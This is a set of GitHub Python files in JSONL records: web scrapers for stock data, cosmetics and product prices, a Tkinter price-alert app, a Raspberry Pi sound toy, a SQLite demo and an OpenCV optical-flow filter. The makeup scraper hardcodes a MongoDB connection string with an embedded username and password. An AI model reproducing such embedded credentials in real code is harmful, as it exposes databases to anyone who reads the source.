+{"seq_id":"28409120447","text":"# -*- coding: utf-8 -*-\nimport scrapy\nimport re\nfrom urllib.parse import urljoin\nimport pymysql\nfrom scrapyProject.items import Item, CodeModel\n\nclass ScrapynameSpider(scrapy.Spider):\n    name = 'codeLiang'\n    def start_requests(self):\n        if not CodeModel.table_exists():\n            CodeModel.create_table()\n        yield scrapy.Request(url='http://data.10jqka.com.cn/rank/ljqd/', callback=self.parse_list)\n\n    def parse_list(self, response):\n        CodeModel.delete().where(CodeModel.type == 2).execute()  # clear previously stored rows of this type\n        prev_item = response.meta.get('item')\n        for elem in response.css('table tbody tr'):\n            item = Item()\n            #item = {}\n            # print(111111111111111111111)\n            # print(elem.css('.tc:nth-child(2) > a::text').extract_first())\n            # print(111111111111111111111)\n            item['code'] = elem.css('.tc:nth-child(2) > a::text').extract_first()\n            item['codeName'] = elem.css('.tc:nth-child(3) > a::text').extract_first()\n            item['continuityDay'] = elem.css('.tc:nth-child(5)::text').extract_first()\n            item['industry'] = elem.css('.tc:nth-child(8) > a::text').extract_first()\n            item['type'] = 2\n            try:\n                CodeModel.create(code=item['code'], codeName=item['codeName'], continuityDay=item['continuityDay'], industry=item['industry'], type=item['type'])\n            except Exception as e:\n                if str(e.args[0]) == '1062':\n                    print('Duplicate entry, skipping.')\n                else:\n                    print(e.args[0], e.args[1])\n            #item['url'] = elem.css('.tc:nth-child(2) > a::attr(\"href\")').extract_first()\n            if prev_item is not None:\n                for key, value in prev_item.items():\n                    item[key] = value\n            yield item\n","repo_name":"1014470807/scrapy","sub_path":"spiders/codeLiang.py","file_name":"codeLiang.py","file_ext":"py","file_size_in_byte":1826,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"}
+{"seq_id":"373327282","text":"def calc(string, letter):\r\n    totalchar = len(string)\r\n    matching_characters = string.count(letter)\r\n    percentage = (matching_characters / totalchar) * 100\r\n    ppercent = int(percentage)\r\n    return ppercent\r\n\r\n# Test the function\r\nstring = input(\"Enter a string: \")\r\nletter = input(\"Enter a character: \")\r\npercentage = calc(string, letter)\r\nprint(f\"The percentage of '{letter}' in '{string}' is: {percentage}%\")\r\n","repo_name":"spongebobx18/code","sub_path":"percentstr.py","file_name":"percentstr.py","file_ext":"py","file_size_in_byte":420,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"}
+{"seq_id":"26471502752","text":"import os\nimport logging as log\n\nfrom sqlite3wrapper import Sqlite3Wrapper\n\n\ndef main():\n    log.basicConfig(level=log.DEBUG, format=\"[%(levelname)s] %(asctime)s - %(message)s\")\n\n    db_path = \"test.db\"\n\n    if os.path.isfile(db_path):\n        os.remove(db_path)\n\n    with Sqlite3Wrapper(db_path) as con:\n        cur = con.cursor()\n        cur.execute(\"CREATE TABLE person (id INTEGER PRIMARY KEY AUTOINCREMENT, firstname TEXT)\")\n        cur.execute(\"INSERT INTO person (firstname) VALUES ('Peter')\")\n        cur.execute(\"SELECT * FROM person\")\n        print(cur.fetchall())\n\n\nif __name__ == \"__main__\":\n    main()\n","repo_name":"aronand/random_python_stuff","sub_path":"sqlite3wrapper/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":615,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
+{"seq_id":"26451257900","text":"#Python GPIO library of choice is gpiozero\nfrom gpiozero import Button\n#sleep function helps eliminate contact bounce issues\nfrom time import sleep\n#module to play audio files\nfrom pygame import mixer\nmixer.init()\n#load sound files\n#note: files need to be 16 bit\nsound1 = mixer.Sound('stars.wav')\nsound2 = mixer.Sound('windbells.wav')\nsound3 = mixer.Sound('childrenofthestars.wav')\n#momentary button\nbutton = Button(4)\n#spst switch\nswitch = Button(23, bounce_time = 0.1)\nswitchFlag = 0 #remember if it's on or off\n\n#joystick buttons\njoy1 = Button(22)\njoy2 = Button(27)\njoy3 = Button(17)\nyFlag = 0 #remember if y has been touched\nxFlag = 0 #remember if x has been touched\n\nwhile True:\n\t#state 1 just button pressed\n\tif button.is_pressed and switchFlag == 0:\n\t\tsound1.play()\n\t\tprint(\"button is pressed\")\n\t\t#print(switchFlag)\n\t\tsleep(0.1)\n\t\tbutton.wait_for_release()\n\t#state 2 button and switch on only\n\telif button.is_pressed and switchFlag == 1 and yFlag == 0 and xFlag == 0:\n\t\tsound2.play()\n\t\tprint(\"special button is pressed\")\n\t\t#print(switchFlag)\n\t\tsleep(0.1)\n\t\tbutton.wait_for_release()\n\t#state 3 button and switch on and both directions on joystick toggled\n\telif button.is_pressed and switchFlag == 1 and yFlag == 1 and xFlag == 1:\n\t\tsound3.play()\n\t\tprint(\"extra special button is pressed\")\n\t\t#print(yFlag)\n\t\t#print(xFlag)\n\t\tsleep(0.1)\n\t\tbutton.wait_for_release()\n\t#if joystick is pressed down, previous joystick settings are reset\n\telif joy1.is_pressed:\n\t\tprint(\"reset\")\n\t\tyFlag = 0\n\t\txFlag = 0\n\t\tsleep(0.1)\n\t#check for y toggle\n\telif joy2.is_pressed:\n\t\tprint(\"y is pressed\")\n\t\tyFlag = 1\n\t\tsleep(0.1)\n\t#check for x toggle\n\telif joy3.is_pressed:\n\t\tprint(\"x is pressed\")\n\t\txFlag = 1\n\t\tsleep(0.1)\n\t#check to see if switch is on\n\telif switch.is_pressed:\n\t\tswitchFlag = 1\n\t#check to see if switch is off\n\telif not switch.is_pressed:\n\t\tswitchFlag = 0\n","repo_name":"hongyingaliu/CPSC-334-Creative-Embedded-Systems","sub_path":"interactive devices/task1/task1.py","file_name":"task1.py","file_ext":"py","file_size_in_byte":1855,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
+{"seq_id":"41637171390","text":"# -*- coding: utf-8 -*-\nfrom bs4 import BeautifulSoup\nfrom bson.objectid import ObjectId\nimport requests\nimport re\nimport pymongo\n\n\nconn_string='mongodb+srv://mongo:1234@cluster0.9xrn6.mongodb.net/test'\nclient=pymongo.MongoClient(conn_string)\n\nmydb=client['Products']\ndb=mydb.products\n\n\nproductsList=[]\n\nfor offset in range(0, 350*36, 36):\n    url = f\"https://makeup.sk/ajax/filter/?offset={offset}\"\n    r = requests.post(url=url, data={'categoryID': 2419})\n    response = r.json()\n    soup = BeautifulSoup(response['products'], 'html.parser')\n    products = soup.find_all('li', class_= 'simple-slider-list__item')\n    for p in products:\n        try:\n            if not soup.find('li', class_= 'out-of-stock'):\n                brand = p.get(\"data-brand\")\n                \n                name = p.find('a', attrs={'class':'simple-slider-list__name'}).text\n                \n                price = p.get(\"data-price\")\n                price = float(price)\n                \n                categorytmp = p.get('data-parent-category')\n                categorytmp = re.sub('Make-up/', '', categorytmp)\n                if categorytmp:  # keep the stripped category only when it is non-empty\n                    category=categorytmp\n                else:\n                    category=\"nešpecifikovaná\"\n                \n                url = f\"https://makeup.sk/{p.find('a')['href']}\"\n                \n                imageUrl = p.find('img').attrs['data-src-x2']\n                \n                obj={\n                    'Brand': brand.capitalize(),\n                    'Name':name.encode('ascii', 'ignore').decode('utf-8'),\n                    'Price':price,\n                    'Category':category.capitalize(),\n                    'Url':url,\n                    'Image':imageUrl,\n                    \"Eshop\": \"makeup\"\n                }\n                productsList.append(obj)\n            else:\n                break\n        except Exception as e:\n            print(e)\n            continue\n\n# first insertion of the data into the database\n    # db.insert_many(productsList)\n\n# updating the data in the database\nproducts=db.find({})\n\nfor p in products:\n    db.update_one({\"_id\": ObjectId(p[\"_id\"])}, \n                { \"$set\":\n                    {\"Name\": p[\"Name\"],\n                     \"Brand\": p[\"Brand\"], \n                     \"Price\": p[\"Price\"], \n                     \"Category\": p[\"Category\"], \n                     \"Url\": p[\"Url\"], \n                     \"Image\": p[\"Image\"],\n                     \"Eshop\": \"makeup\"}},\n                upsert=True)\n\n    ","repo_name":"xlysova/MyWork","sub_path":"BachelorThesis/webscraper/makeup.py","file_name":"makeup.py","file_ext":"py","file_size_in_byte":2508,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
+{"seq_id":"31342573584","text":"import cv2\nimport numpy as np\n\nfrom video_loop import run_video_capture_pipeline, args\n\ncap = cv2.VideoCapture(args.read_camera)\nret, frame1 = cap.read()\nprvs = cv2.cvtColor(frame1, cv2.COLOR_BGR2GRAY)\nhsv = np.zeros_like(frame1)\nhsv[..., 1] = 255\ncap.release()\n\n\ndef dense_flow(image):\n    global prvs\n    next =
cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n\n flow = cv2.calcOpticalFlowFarneback(prvs, next, None, 0.5, 3, 15, 3, 5, 1.2, 0)\n\n mag, ang = cv2.cartToPolar(flow[..., 0], flow[..., 1])\n hsv[..., 0] = ang * 180 / np.pi / 2\n hsv[..., 2] = cv2.normalize(mag, None, 0, 255, cv2.NORM_MINMAX)\n image = cv2.cvtColor(hsv, cv2.COLOR_HSV2BGR)\n\n prvs = next\n return image\n\n\nrun_video_capture_pipeline(transform_fn=dense_flow)\n","repo_name":"charlielito/snapchat-filters-opencv","sub_path":"scripts/dense_optflow.py","file_name":"dense_optflow.py","file_ext":"py","file_size_in_byte":744,"program_lang":"python","lang":"en","doc_type":"code","stars":200,"dataset":"github-code","pt":"40"} +{"seq_id":"42605525510","text":"#################################################################### All LIBRARY IMPORTED ############################################################\nimport requests\nfrom bs4 import BeautifulSoup\nfrom tkinter import *\nfrom tkinter import ttk\nfrom PIL import Image, ImageTk\nfrom threading import *\n\n# Initialize Window\n\nroot = Tk()\nroot.title(\"Price Alert\")\nroot.geometry(\"600x600\")\n\nHEADER = {\n \"User-Agent\": \"xyz\"\n}\n################################################################ FLIPKART #############################################################################\n\n\ndef flipkart_detail(URL):\n page = requests.get(URL, headers=HEADER)\n soup = BeautifulSoup(page.content, 'html.parser')\n # common for both (name and price)\n frame_1 = soup.find('div', class_='_1HmYoV hCUpcT')\n frame_2 = frame_1.find('div', class_='_1HmYoV _35HD7C col-8-12')\n frame_3 = frame_2.find('div', class_='bhgxx2 col-12-12')\n frame_4 = frame_3.find('h1', class_='_9E25nV')\n frame_5 = frame_4.find('span', class_='_35KyD6')\n # flipkart product name\n flipkart_product_name = frame_5.text\n frame_6 = frame_3.find('div', class_='_1uv9Cb')\n # flipkart product price\n flipkart_product_price = frame_6.find(\n 'div', class_='_1vC4OE _3qQ9m1').text\n return flipkart_product_name, flipkart_product_price\n\n################################################################ AMAZON #############################################################################\n\n\ndef amazon_detail(URL):\n page = requests.get(URL, headers=HEADER)\n soup = BeautifulSoup(page.content, 'html.parser')\n # common for both (name and price)\n frame_1_common = soup.find('div', id='centerCol')\n # amazon product price\n frame_3_price = frame_1_common.find('div', id='unifiedPrice_feature_div')\n frame_4_price = frame_3_price.find('div', id='price')\n frame_5_price = frame_4_price.find('table', class_='a-lineitem')\n try:\n frame_6_price = frame_5_price.find('tr', id='priceblock_saleprice_row')\n frame_7_price = frame_6_price.find('td', class_='a-span12')\n frame_8_price = frame_7_price.find('span', id='priceblock_saleprice')\n except:\n pass\n try:\n frame_6_price = frame_5_price.find('tr', id='priceblock_ourprice_row')\n frame_7_price = frame_6_price.find('td', class_='a-span12')\n frame_8_price = frame_7_price.find('span', id='priceblock_ourprice')\n except:\n pass\n amazon_product_price = frame_8_price.text.strip()\n\n # amazon product name\n frame_2_title = frame_1_common.find('div', id='title_feature_div')\n frame_3_title = frame_2_title .find('div', id='titleSection')\n frame_4_title = frame_3_title .find(\n 'h1', class_='a-size-large a-spacing-none')\n frame_5_title = frame_4_title .find('span', id='productTitle')\n amazon_product_name = frame_5_title.text.strip()\n\n return amazon_product_price, 
amazon_product_name\n\n################################################################ EBAY P #############################################################################\n\n\ndef Ebay_p_detail(URL):\n page = requests.get(URL, headers=HEADER)\n soup = BeautifulSoup(page.content, 'lxml')\n\n # common for both (name and price)\n main_content = soup.find('div', id='mainContent')\n frame_1_common = main_content.find(\n 'div', class_='product-buy-container product-buy-container-new-ui')\n\n # ebay p product name\n frame_2_name = frame_1_common.find('div', class_='product')\n frame_3_name = frame_2_name.find(\n 'div', class_='product-card-wrapper clearfix')\n frame_4_name = frame_3_name.find(\n 'div', class_='product-info no-product-picture')\n ebay_p_product_name = frame_4_name.h1.text.strip()\n\n # ebay p product price\n for count in range(2, 4):\n try:\n frame_2_price = frame_1_common.find('div', id='center-panel')\n frame_3_price = frame_2_price.find('div', id='hero-item')\n frame_4_price = frame_3_price.find(\n 'div', class_='app-theme-item-wrapper shown')\n frame_5_price = frame_4_price.find('div', class_='item-desc')\n frame_6_price = frame_5_price.find(\n 'div', class_='item-content-wrapper')\n try:\n frame_7_price = frame_6_price.find('div', class_='item-offer')\n except:\n pass\n try:\n frame_8_price = frame_6_price.find(\n 'div', id=f'tab-panel-0-w{count}') # tab-panel-0-w2\n except:\n pass\n try:\n frame_8_price = frame_7_price.find(\n 'div', id=f'tab-panel-0-w{count}') # tab-panel-0-w2\n except:\n pass\n frame_9_price = frame_8_price.find(\n 'div', class_='item-price-logistics-wrapper')\n ebay_p_product_price = frame_9_price.h2.text.strip()\n except:\n pass\n\n return ebay_p_product_name, ebay_p_product_price\n\n################################################################ EBAY ITM #############################################################################\n\n\ndef Ebay_itm_detail(URL):\n page = requests.get(URL, headers=HEADER)\n soup = BeautifulSoup(page.content, 'lxml')\n\n # common for both (name and price)\n main_content = soup.find('div', id='CenterPanelInternal')\n frame_1_common = main_content.find('div', id='LeftSummaryPanel')\n\n # ebay itm product price\n frame_2_price = frame_1_common.find('div', id='mainContent')\n frame_3_price = frame_2_price.find(\n 'div', class_='c-std vi-ds3cont-box-marpad')\n frame_4_price = frame_3_price.find(\n 'div', class_='actPanel vi-noborder')\n frame_5_price = frame_4_price.find(\n 'div', class_='u-flL w29 vi-price')\n ebay_itm_product_price = frame_5_price.span.text\n\n # ebay itm product name\n frame_2_name = frame_1_common.find('div', class_='vi-swc-lsp')\n frame_3_name = frame_2_name.find('span', id='vi-lkhdr-itmTitl')\n ebay_itm_product_name = frame_3_name.text\n\n return ebay_itm_product_name, ebay_itm_product_price\n\n\n############################################# MERGING BOTH P AND ITM EBAY FUCNTION ####################################################################\n\ndef ebay_finder(URL):\n ebay_len = len('https://www.ebay.com/')\n find_ebay = URL[ebay_len:]\n product_find = URL[ebay_len:].split('/')\n\n # EBAY FOR P PRODUCT\n\n if product_find[0] == 'p':\n ebay_p_product_price, ebay_p_product_title = Ebay_p_detail(URL)\n return ebay_p_product_price, ebay_p_product_title\n\n # ebay for itm product\n\n if product_find[0] == 'itm':\n ebay_itm_product_price, ebay_itm_product_title = Ebay_itm_detail(URL)\n return ebay_itm_product_price, 
ebay_itm_product_title\n\n################################################################ SNAPDEAL #############################################################################\n\n\ndef snapdeal_detail(URL):\n snapdeal_product_type = {\n \"fashion\": ['pdp-fash-topcenter-inner layout', 'fashionPriceTile row', 'col-xs-18'],\n \"electronics\": ['pdp-elec-topcenter-inner layout', 'elecPriceTile buyNowBlock row', 'col-xs-22'],\n\n }\n page = requests.get(URL, headers=HEADER)\n soup = BeautifulSoup(page.content, 'html.parser')\n\n # common for both (name and price)\n\n main_content = soup.find('section', id='overviewBlk')\n frame_1_common = main_content.find(\n 'div', class_='product-detail clearfix col-xs-24 reset-padding favDp')\n frame_2_common = frame_1_common.find(\n 'div', class_='col-xs-14 right-card-zoom reset-padding')\n frame_3_common = frame_2_common.find(\n 'div', class_='pdp-comp comp-product-description clearfix')\n for i in snapdeal_product_type:\n try:\n frame_4_common = frame_3_common.find(\n 'div', class_=snapdeal_product_type[i][0]) # pdp-elec-topcenter-inner layout # pdp-fash-topcenter-inner layout\n\n # snapdeal product price\n\n frame_5_price = frame_4_common.find(\n 'div', class_='container-fluid reset-padding')\n frame_6_price = frame_5_price.find(\n 'div', class_=snapdeal_product_type[i][1]) # elecPriceTile buyNowBlock row # fashionPriceTile row\n frame_7_price = frame_6_price.find(\n 'div', class_='row reset-margin')\n frame_8_price = frame_7_price.find(\n 'div', class_='col-xs-14 reset-padding padL8')\n frame_9_price = frame_8_price.find(\n 'div', class_='disp-table')\n frame_10_price = frame_9_price.find(\n 'div', class_='pdp-e-i-PAY-r disp-table-cell lfloat')\n snapdeal_product_price = frame_10_price.span.text.strip()\n\n # snapdeal product name\n\n frame_5_name = frame_4_common.find(\n 'div', class_='row')\n frame_6_name = frame_5_name.find(\n 'div', class_=snapdeal_product_type[i][2]) # col-xs-22 # col-xs-18\n snapdeal_product_name = frame_6_name.h1.text.strip()\n\n return snapdeal_product_name, snapdeal_product_price\n except:\n pass\n\n################################################################ SHOPCLUES #############################################################################\n\n\ndef shopclues_products(URL):\n page = requests.get(URL, headers=HEADER)\n soup = BeautifulSoup(page.content, 'html.parser')\n\n # common for both (name and price)\n\n main_content = soup.find('div', class_='container')\n frame_1_common = main_content.find('div', class_='wrapper maxStWrap')\n frame_2_common = frame_1_common.find('div', id='main_data')\n frame_3_common = frame_2_common.find('div', class_='shd_box')\n frame_4_common = frame_3_common.find('div', class_='prd_mid_info')\n\n # shopclues product price\n\n frame_5_price = frame_4_common.find('div', class_='price')\n frame_6_price = frame_5_price.find('span', class_='f_price')\n shopclues_product_price = frame_6_price.text.strip()\n\n # shopclues product name\n shopclues_product_name = frame_4_common.h1.text.strip()\n return shopclues_product_name, shopclues_product_price\n\n\n################################################################ EDX #############################################################################\n\ndef Edx_Course(URL):\n page = requests.get(URL, headers=HEADER)\n soup = BeautifulSoup(page.content, 'html.parser')\n\n # common for both (name and price)\n\n main_content = soup.find('main', id='main-content')\n frame_1_common = main_content.find('div', class_='course-info-content')\n\n # edx 
course price\n\n frame_2_price = frame_1_common.find(\n 'div', class_='row no-gutters main-content')\n frame_3_price = frame_2_price.find(\n 'div', class_='col-lg-4 order-lg-2 offset-lg-1')\n frame_4_price = frame_3_price.find(\n 'div', class_='container course-side-area')\n frame_5_price = frame_4_price.find(\n 'ul', class_='list-group list-group-flush w-100')\n frames_6_price = frame_5_price.find('p', class_='m-0')\n edx_course_price = frames_6_price.text.strip()\n\n # edx course title\n\n frame_2_title = frame_1_common.find(\n 'header', class_='course-header push-away-from-absolute-header mb-4 row')\n frame_3_title = frame_2_title.find('div', id='course-header')\n frame_4_title = frame_3_title.find('div', class_='row no-gutters w-100')\n frame_5_title = frame_4_title.find(\n 'h1', class_='course-intro-heading mb-2')\n edx_course_title = frame_5_title.text.strip()\n\n return edx_course_price, edx_course_title\n\n################################################################ EDX COURSE OTHER TYPE ###############################################################\n\n\ndef Edx_other_type_course(URL):\n page = requests.get(URL, headers=HEADER)\n soup = BeautifulSoup(page.content, 'html.parser')\n\n # common for both (name and price)\n\n main_content = soup.find('main', id='main-content')\n\n # edx other course type price\n\n frame_1_price = main_content.find(\n 'div', class_='gradient-wrapper program-body')\n frame_2_price = frame_1_price.find(\n 'div', class_='container')\n frame_3_price = frame_2_price.find(\n 'div', class_='container-fluid program-section')\n frame_4_price = frame_3_price.find('div', class_='row')\n frame_5_price = frame_4_price.find('div', class_='flex-column')\n frame_6_price = frame_5_price.find('div', class_='main d-flex flex-wrap')\n edx_other_type_course_price = frame_6_price.text.strip()\n\n # edx other course type title\n\n frame_1_title = main_content.find('div', class_='data-bar shadow')\n for count in range(1, 3):\n try:\n frame_2_title = frame_1_title.find(\n 'div', class_=f'data-bar-content partner-count-{count}') # data-bar-content partner-count-2\n frame_3_title = frame_2_title.find(\n 'div', class_='container-fluid')\n frame_4_title = frame_3_title.find(\n 'div', class_='row')\n frame_5_title = frame_4_title.find(\n 'div', class_='program')\n frame_6_title = frame_5_title.find(\n 'div', class_='type')\n frame_7_title = frame_6_title.find(\n 'div', class_='title')\n edx_other_type_course_title = frame_7_title.text.strip()\n except:\n pass\n # the course title is in french language , convert into english\n\n return edx_other_type_course_price, edx_other_type_course_title\n\n\n######################################################## MERGING BOTH EDX FUCNTION ###################################################################\n\ndef edx_finder(URL):\n edx_len = len('https://www.edx.org/')\n find_edx = URL[edx_len:]\n course_find = URL[edx_len:].split('/')\n\n if course_find[0] == 'course':\n edx_course_price, edx_course_title = Edx_Course(URL)\n return edx_course_price, edx_course_title\n\n # edx for same other type\n\n if course_find[0] != 'course':\n edx_other_type_course_price, edx_other_type_course_title = Edx_other_type_course(\n URL)\n return edx_other_type_course_price, edx_other_type_course_title\n\n################################################################ UDEMY ################################################################################\n\n\ndef Udemy_course(URL):\n page = requests.get(URL, headers=HEADER)\n soup = 
BeautifulSoup(page.content, 'html.parser')\n\n # common for both (name and price)\n\n main_content = soup.find('div', class_='main-content')\n frame_1_common = main_content.find(\n 'div', class_='full-width full-width--streamer streamer--complete')\n frame_2_common = frame_1_common.find('div', class_='container')\n\n # udemy course price\n\n frame_3_price = frame_2_common.find(\n 'div', class_='js-right-col__content right-col__content')\n frame_4_price = frame_3_price.find(\n 'div', class_='right-col__module')\n frame_5_price = frame_4_price.find(\n 'div', class_='right-col__inner')\n frame_6_price = frame_5_price.find(\n 'div', 'ud-component--clp--price-text')\n frame_7_price = frame_6_price.find(\n 'div', 'price-text')\n frame_8_price = frame_7_price.find(\n 'span', 'price-text__current')\n udemy_course_price = frame_8_price.text.strip()\n\n # udemy course title\n\n frame_3_title = frame_2_common.find('div', class_='clp-lead')\n frame_4_title = frame_3_title.find('div', class_='clp-component-render')\n frame_5_title = frame_4_title.find('h1')\n udemy_course_name = frame_5_title.text.strip()\n\n return udemy_course_name, udemy_course_price\n\n# Threading\n\n\ndef product_detail_threading():\n print(\"start\")\n t1 = Thread(target=product_detail)\n t1.start()\n print(\"done\")\n\n########################################################## COMBINING ALL FUNCTION #################################################################\n\n\ndef product_detail():\n url = enter_url.get(\"1.0\", \"end\").strip()\n\n # Amazon\n\n if radiobutton_variable.get() == \"1\":\n try:\n status_variable.set(\"Fetching Details....\")\n status_label.update()\n amazon_product_price, amazon_product_name = amazon_detail(url)\n product_name_label.update()\n product_name_variable.set(amazon_product_name)\n current_price_label.update()\n current_price_variable.set(amazon_product_price)\n status_variable.set(\"Ready\")\n status_label.update()\n except Exception as e:\n print(e)\n status_variable.set(\"Try Again....\")\n\n # Flipkart\n\n if radiobutton_variable.get() == \"2\":\n try:\n status_variable.set(\"Fetching Details....\")\n status_label.update()\n flipkart_product_name, flipkart_product_price = flipkart_detail(\n url)\n product_name_label.update()\n product_name_variable.set(flipkart_product_name)\n current_price_label.update()\n current_price_variable.set(flipkart_product_price)\n status_variable.set(\"Ready\")\n status_label.update()\n except Exception as e:\n print(e)\n status_variable.set(\"Try Again....\")\n\n # Edx\n\n if radiobutton_variable.get() == \"3\":\n try:\n status_variable.set(\"Fetching Details....\")\n status_label.update()\n edx_price, edx_title = edx_finder(url)\n product_name_label.update()\n product_name_variable.set(edx_title)\n current_price_label.update()\n current_price_variable.set(edx_price)\n status_variable.set(\"Ready\")\n status_label.update()\n except Exception as e:\n print(e)\n status_variable.set(\"Try Again....\")\n\n # Udemy\n\n if radiobutton_variable.get() == \"4\":\n try:\n status_variable.set(\"Fetching Details....\")\n status_label.update()\n udemy_course_name, udemy_course_price = Udemy_course(url)\n product_name_label.update()\n product_name_variable.set(udemy_course_name)\n current_price_label.update()\n current_price_variable.set(udemy_course_price)\n status_variable.set(\"Ready\")\n status_label.update()\n except Exception as e:\n print(e)\n status_variable.set(\"Try Again....\")\n status_variable.set(\"Try Again....\")\n\n # Ebay\n\n if radiobutton_variable.get() == 
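A caution about `product_detail_threading`: the scrape runs on a worker thread, but that worker then calls `update()` and `set()` on Tkinter widgets, and Tkinter is not thread-safe. A common pattern, sketched here with stand-in data rather than the app's real scrapers, is to hand results to the main loop through a queue polled with `after()`:

```python
# Hedged sketch: only the Tk main loop touches widgets; the worker thread
# just pushes its result onto a queue.
import queue
import threading
import tkinter as tk

results = queue.Queue()

def worker():
    # stand-in for the scraping call; runs off the main thread
    results.put(("Example product", "Rs. 499"))

def poll(root, name_var, price_var):
    try:
        name, price = results.get_nowait()
    except queue.Empty:
        pass
    else:
        name_var.set(name)
        price_var.set(price)
    root.after(100, poll, root, name_var, price_var)  # keep polling

root = tk.Tk()
name_var, price_var = tk.StringVar(), tk.StringVar()
tk.Label(root, textvariable=name_var).pack()
tk.Label(root, textvariable=price_var).pack()
threading.Thread(target=worker, daemon=True).start()
poll(root, name_var, price_var)
root.mainloop()
```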
\"5\":\n try:\n status_variable.set(\"Fetching Details....\")\n status_label.update()\n eday_product_name, ebay_product_price = ebay_finder(url)\n product_name_label.update()\n product_name_variable.set(eday_product_name)\n current_price_label.update()\n current_price_variable.set(ebay_product_price)\n status_variable.set(\"Ready\")\n status_label.update()\n except Exception as e:\n print(e)\n status_variable.set(\"Try Again....\")\n\n # Snapdeal\n\n if radiobutton_variable.get() == \"6\":\n try:\n status_variable.set(\"Fetching Details....\")\n status_label.update()\n snapdeal_product_name, snapdeal_product_price = snapdeal_detail(\n url)\n product_name_label.update()\n product_name_variable.set(snapdeal_product_name)\n current_price_label.update()\n current_price_variable.set(snapdeal_product_price)\n status_variable.set(\"Ready\")\n status_label.update()\n except Exception as e:\n print(e)\n status_variable.set(\"Try Again....\")\n\n # Shopclues\n\n if radiobutton_variable.get() == \"7\":\n try:\n status_variable.set(\"Fetching Details....\")\n status_label.update()\n shopclues_product_name, shopclues_product_price = shopclues_products(\n url)\n product_name_label.update()\n product_name_variable.set(shopclues_product_name)\n current_price_label.update()\n current_price_variable.set(shopclues_product_price)\n status_variable.set(\"Ready\")\n status_label.update()\n except Exception as e:\n print(e)\n status_variable.set(\"Try Again....\")\n\n\ndef all_details():\n if radiobutton_variable.get() == \"1\":\n company_name = \"Amazon\"\n if radiobutton_variable.get() == \"2\":\n company_name = \"Flipkart\"\n if radiobutton_variable.get() == \"3\":\n company_name = \"Edx\"\n if radiobutton_variable.get() == \"4\":\n company_name = \"Udemy\"\n if radiobutton_variable.get() == \"5\":\n company_name = \"Ebay\"\n if radiobutton_variable.get() == \"6\":\n company_name = \"Snapdeal\"\n if radiobutton_variable.get() == \"6\":\n company_name = \"Shopclues\"\n print(company_name)\n print(product_name_label.cget(\"text\"))\n print(current_price_label.cget(\"text\"))\n print(set_price.get())\n print(set_time.get())\n print(initial_time_type_variable.get())\n\n# increment time\n\n\ndef increment_value():\n if int(set_time.get()) < 0:\n initial_time.set(int(0))\n set_time.update()\n else:\n initial_time.set(int(set_time.get())+1)\n set_time.update()\n\n# decrement time\n\n\ndef decrement_value():\n if int(set_time.get()) < 0:\n initial_time.set(int(0))\n set_time.update()\n if int(set_time.get()) > 0:\n initial_time.set(int(set_time.get())-1)\n set_time.update()\n\n# Main program starts\n\n\nif __name__ == \"__main__\":\n\n # price drop heading\n price_drop_alert = Label(root, text=\"Price Drop Alert\",\n font=(\"Times\", \"26\", \"bold italic\"))\n price_drop_alert.place(x=10, y=5)\n\n # url\n enter_url_label = Label(root, text=\"Enter URL :\",\n font=(\"Times\", \"20\"))\n enter_url_label.place(x=60, y=67)\n enter_url = Text(root, width=40, height=3)\n enter_url.place(x=200, y=60)\n\n # company\n company_label = Label(root, text=\"Company :\",\n font=(\"Times\", \"20\"))\n company_label.place(x=67, y=120)\n\n # radio buttons\n radiobutton_variable = StringVar()\n radiobutton_variable.set(\"1\")\n Radiobutton1 = Radiobutton(text=\"Amazon\", variable=radiobutton_variable, font=(\"Times\", \"10\", \"bold\"),\n value=1)\n Radiobutton1.place(x=200, y=113)\n Radiobutton2 = Radiobutton(text=\"Flipkart\", variable=radiobutton_variable, font=(\"Times\", \"10\", \"bold\"),\n value=2)\n Radiobutton2.place(x=270, 
y=113)\n Radiobutton3 = Radiobutton(text=\"Edx\", variable=radiobutton_variable, font=(\"Times\", \"10\", \"bold\"),\n value=3)\n Radiobutton3.place(x=340, y=113)\n Radiobutton4 = Radiobutton(text=\"Udemy\", variable=radiobutton_variable, font=(\"Times\", \"10\", \"bold\"),\n value=4)\n Radiobutton4.place(x=385, y=113)\n Radiobutton5 = Radiobutton(text=\"Ebay\", variable=radiobutton_variable, font=(\"Times\", \"10\", \"bold\"),\n value=5)\n Radiobutton5.place(x=470, y=113)\n Radiobutton6 = Radiobutton(text=\"Snapdeal\", variable=radiobutton_variable, font=(\"Times\", \"10\", \"bold\"),\n value=6)\n Radiobutton6.place(x=280, y=133)\n Radiobutton6 = Radiobutton(text=\"Shopclues\", variable=radiobutton_variable, font=(\"Times\", \"10\", \"bold\"),\n value=7)\n Radiobutton6.place(x=200, y=133)\n\n # search button\n search = Button(root, text=\"Search Product\",\n font=(\"Times\", \"20\", \"bold italic\"), command=product_detail_threading)\n search.place(x=200, y=160)\n\n # product name\n product_name = Label(root, text=\"Product name :\", font=(\"Times\", \"20\"))\n product_name.place(x=60, y=223)\n\n product_name_variable = StringVar()\n product_name_variable.set(\"\")\n product_name_label = Label(\n root, textvariable=product_name_variable, fg='red',\n width=50, height=3, anchor=\"nw\", wraplength=300)\n product_name_label.place(x=230, y=231)\n\n # current price\n current_price = Label(root, text=\"Current price :\", font=(\"Times\", \"20\"))\n current_price.place(x=60, y=275)\n\n current_price_variable = StringVar()\n current_price_variable.set(\"\")\n current_price_label = Label(\n root, textvariable=current_price_variable, fg='red',\n width=20, anchor=\"nw\", wraplength=300)\n current_price_label.place(x=230, y=285)\n\n # if above details are not correct\n detial_not_correct_label = Label(\n root, text=''' If Above Details are not correct , \n Please send the searched link on this email\n \"kumar.abhishekgoyal@gmail.com\"''',\n font=(\"Times\", \"15\"), fg='red')\n detial_not_correct_label.place(x=80, y=330)\n\n # set price\n set_price_label = Label(root, text=\"Set Price :\", font=(\"Times\", \"20\"))\n set_price_label.place(x=60, y=410)\n set_price = Entry(root, font=(\"Times\", \"20\"))\n set_price.place(x=180, y=410)\n\n # set time\n initial_time = IntVar()\n initial_time.set(1)\n set_time_label = Label(root, text=\"Set Time :\", 